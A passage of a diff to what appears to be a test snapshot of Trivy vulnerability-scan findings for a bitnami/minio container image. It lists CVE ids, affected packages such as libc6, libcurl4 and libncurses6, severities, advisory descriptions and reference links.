"value": "https://access.redhat.com/security/cve/CVE-2015-3276", + "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1238322", + "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2015-3276.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2015-2131.html", + "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2015-3276", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2015-3276", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", }, ], "severity": "LOW", @@ -61168,46 +61579,56 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-14159", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", + "id": "CVE-2019-1010022", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "http://www.openldap.org/its/index.cgi?findid=8703", - "https://access.redhat.com/security/cve/CVE-2017-14159", - "https://nvd.nist.gov/vuln/detail/CVE-2017-14159", - "https://www.cve.org/CVERecord?id=CVE-2017-14159", - "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022", ], }, "category": "Vulnerability", - "description": "slapd in OpenLDAP 2.4.45 and earlier creates a PID file after dropping privileges to a non-root account, which might allow local users to kill arbitrary processes by leveraging access to this non-root account for PID file modification before a root script executes a "kill \`cat /pathname\`" command, as demonstrated by openldap-initscript.", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "openldap: Privilege escalation via PID file manipulation", + "name": "glibc: stack guard protection bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-14159", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", }, { "type": "URL", - "value": "http://www.openldap.org/its/index.cgi?findid=8703", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-14159", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-14159", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-14159", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/CVE-2019-1010022", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", }, ], "severity": "LOW", @@ -61216,61 +61637,61 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-17740", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", + "id": "CVE-2019-1010023", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00053.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00058.html", - "http://www.openldap.org/its/index.cgi/Incoming?id=8759", - "https://access.redhat.com/security/cve/CVE-2017-17740", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - "https://nvd.nist.gov/vuln/detail/CVE-2017-17740", - "https://www.cve.org/CVERecord?id=CVE-2017-17740", - "https://www.oracle.com/security-alerts/cpuapr2022.html", + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023", ], }, "category": "Vulnerability", - "description": "contrib/slapd-modules/nops/nops.c in OpenLDAP through 2.4.45, when both the nops module and the memberof overlay are enabled, attempts to free a buffer that was allocated on the stack, which allows remote attackers to cause a denial of service (slapd crash) via a member MODDN operation.", + "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "openldap: contrib/slapd-modules/nops/nops.c attempts to free stack buffer allowing remote attackers to cause a denial of service", + "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-17740", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00053.html", + "value": "http://www.securityfocus.com/bid/109167", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00058.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", }, { "type": "URL", - "value": "http://www.openldap.org/its/index.cgi/Incoming?id=8759", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-17740", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-17740", + "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-17740", + "value": "https://ubuntu.com/security/CVE-2019-1010023", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", }, ], "severity": "LOW", @@ -61279,71 +61700,66 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-15719", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", + "id": "CVE-2019-1010024", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00033.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00059.html", - "https://access.redhat.com/errata/RHBA-2019:3674", - "https://access.redhat.com/security/cve/CVE-2020-15719", - "https://bugs.openldap.org/show_bug.cgi?id=9266", - "https://bugzilla.redhat.com/show_bug.cgi?id=1740070", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - "https://nvd.nist.gov/vuln/detail/CVE-2020-15719", - "https://www.cve.org/CVERecord?id=CVE-2020-15719", - "https://www.oracle.com/security-alerts/cpuapr2022.html", + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010024", + "https://www.cve.org/CVERecord?id=CVE-2019-1010024", ], }, "category": "Vulnerability", - "description": "libldap in certain third-party OpenLDAP packages has a certificate-validation flaw when the third-party package is asserting RFC6125 support. It considers CN even when there is a non-matching subjectAltName (SAN). This is fixed in, for example, openldap-2.4.46-10.el8 in Red Hat Enterprise Linux.", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "openldap: Certificate validation incorrectly matches name against CN-ID", + "name": "glibc: ASLR bypass using cache of thread stack and heap", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-15719", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00033.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00059.html", + "value": "http://www.securityfocus.com/bid/109162", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHBA-2019:3674", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-15719", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", }, { "type": "URL", - "value": "https://bugs.openldap.org/show_bug.cgi?id=9266", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1740070", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-15719", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-15719", + "value": "https://ubuntu.com/security/CVE-2019-1010024", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", }, ], "severity": "LOW", @@ -61352,619 +61768,662 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "2.36.1-8+deb11u1", - "packageName": "libmount1", + "id": "CVE-2019-1010025", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025", ], }, "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "name": "glibc: information disclosure of heap addresses of pthread_created thread", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/CVE-2019-1010025", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "6.2+20201114-2+deb11u1", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-29458", - "installedVersion": "6.2+20201114-2", - "packageName": "libncurses6", + "id": "CVE-2019-9192", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/41", - "https://access.redhat.com/security/cve/CVE-2022-29458", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", - "https://invisible-island.net/ncurses/NEWS.html#t20220416", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", - "https://support.apple.com/kb/HT213488", - "https://ubuntu.com/security/notices/USN-5477-1", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29458", + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", ], }, "category": "Vulnerability", - "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "ncurses: segfaulting OOB read", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29458", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29458", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", - }, - { - "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", - }, - { - "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", - }, - { - "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", - }, - { - "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5477-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29491", - "installedVersion": "6.2+20201114-2", - "packageName": "libncurses6", + "id": "CVE-2022-1304", + "installedVersion": "1.46.2-2", + "packageName": "libcom-err2", "references": [ - "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", - "http://www.openwall.com/lists/oss-security/2023/04/19/10", - "http://www.openwall.com/lists/oss-security/2023/04/19/11", - "https://access.redhat.com/security/cve/CVE-2023-29491", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", - "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", - "https://security.netapp.com/advisory/ntap-20230517-0009/", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2023-29491", - "https://www.openwall.com/lists/oss-security/2023/04/12/5", - "https://www.openwall.com/lists/oss-security/2023/04/13/4", + "https://access.redhat.com/errata/RHSA-2022:8361", + "https://access.redhat.com/security/cve/CVE-2022-1304", + "https://bugzilla.redhat.com/2069726", + "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", + "https://errata.almalinux.org/9/ALSA-2022-8361.html", + "https://errata.rockylinux.org/RLSA-2022:8361", + "https://linux.oracle.com/cve/CVE-2022-1304.html", + "https://linux.oracle.com/errata/ELSA-2022-8361.html", + "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", + "https://ubuntu.com/security/notices/USN-5464-1", + "https://www.cve.org/CVERecord?id=CVE-2022-1304", ], }, "category": "Vulnerability", - "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", + "description": "An out-of-bounds read/write vulnerability was found in e2fsprogs 1.46.5. This issue leads to a segmentation fault and possibly arbitrary code execution via a specially crafted filesystem.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "Local users can trigger security-relevant memory corruption via malformed data", + "name": "e2fsprogs: out-of-bounds read/write via crafted filesystem", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29491", + "value": "https://avd.aquasec.com/nvd/cve-2022-1304", }, { "type": "URL", - "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "value": "https://access.redhat.com/errata/RHSA-2022:8361", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "value": "https://access.redhat.com/security/cve/CVE-2022-1304", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "value": "https://bugzilla.redhat.com/2069726", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29491", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", }, { "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "value": "https://errata.almalinux.org/9/ALSA-2022-8361.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "value": "https://errata.rockylinux.org/RLSA-2022:8361", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", + "value": "https://linux.oracle.com/cve/CVE-2022-1304.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://linux.oracle.com/errata/ELSA-2022-8361.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "value": "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", + "value": "https://ubuntu.com/security/notices/USN-5464-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1304", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "6.2+20201114-2+deb11u1", + "fixedVersion": "7.74.0-1.3+deb11u5", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-29458", - "installedVersion": "6.2+20201114-2", - "packageName": "libncursesw6", + "id": "CVE-2022-32221", + "installedVersion": "7.74.0-1.3+deb11u2", + "packageName": "libcurl4", "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/41", - "https://access.redhat.com/security/cve/CVE-2022-29458", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", - "https://invisible-island.net/ncurses/NEWS.html#t20220416", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", - "https://support.apple.com/kb/HT213488", - "https://ubuntu.com/security/notices/USN-5477-1", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29458", + "http://seclists.org/fulldisclosure/2023/Jan/19", + "http://seclists.org/fulldisclosure/2023/Jan/20", + "http://www.openwall.com/lists/oss-security/2023/05/17/4", + "https://access.redhat.com/errata/RHSA-2023:0333", + "https://access.redhat.com/security/cve/CVE-2022-32221", + "https://bugzilla.redhat.com/2135411", + "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", + "https://curl.se/docs/CVE-2022-32221.html", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", + "https://errata.almalinux.org/9/ALSA-2023-0333.html", + "https://errata.rockylinux.org/RLSA-2023:0333", + "https://hackerone.com/reports/1704017", + "https://linux.oracle.com/cve/CVE-2022-32221.html", + "https://linux.oracle.com/errata/ELSA-2023-0333.html", + "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", + "https://security.gentoo.org/glsa/202212-01", + "https://security.netapp.com/advisory/ntap-20230110-0006/", + "https://security.netapp.com/advisory/ntap-20230208-0002/", + "https://support.apple.com/kb/HT213604", + "https://support.apple.com/kb/HT213605", + "https://ubuntu.com/security/notices/USN-5702-1", + "https://ubuntu.com/security/notices/USN-5702-2", + "https://ubuntu.com/security/notices/USN-5823-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32221", + "https://www.debian.org/security/2023/dsa-5330", ], }, "category": "Vulnerability", - "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", + "description": "When doing HTTP(S) transfers, libcurl might erroneously use the read callback (\`CURLOPT_READFUNCTION\`) to ask for data to send, even when the \`CURLOPT_POSTFIELDS\` option has been set, if the same handle previously was used to issue a \`PUT\` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent \`POST\` request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "ncurses: segfaulting OOB read", + "name": "POST following PUT confusion", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29458", + "value": "https://avd.aquasec.com/nvd/cve-2022-32221", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", + "value": "http://seclists.org/fulldisclosure/2023/Jan/19", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29458", + "value": "http://seclists.org/fulldisclosure/2023/Jan/20", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "value": "http://www.openwall.com/lists/oss-security/2023/05/17/4", }, { "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "value": "https://access.redhat.com/errata/RHSA-2023:0333", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-32221", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "value": "https://bugzilla.redhat.com/2135411", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "value": "https://curl.se/docs/CVE-2022-32221.html", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5477-1", + "value": "https://errata.almalinux.org/9/ALSA-2023-0333.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://errata.rockylinux.org/RLSA-2023:0333", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", + "value": "https://hackerone.com/reports/1704017", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29491", - "installedVersion": "6.2+20201114-2", - "packageName": "libncursesw6", - "references": [ - "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", - "http://www.openwall.com/lists/oss-security/2023/04/19/10", - "http://www.openwall.com/lists/oss-security/2023/04/19/11", - "https://access.redhat.com/security/cve/CVE-2023-29491", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", - "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", - "https://security.netapp.com/advisory/ntap-20230517-0009/", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2023-29491", - "https://www.openwall.com/lists/oss-security/2023/04/12/5", - "https://www.openwall.com/lists/oss-security/2023/04/13/4", - ], - }, - "category": "Vulnerability", - "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or 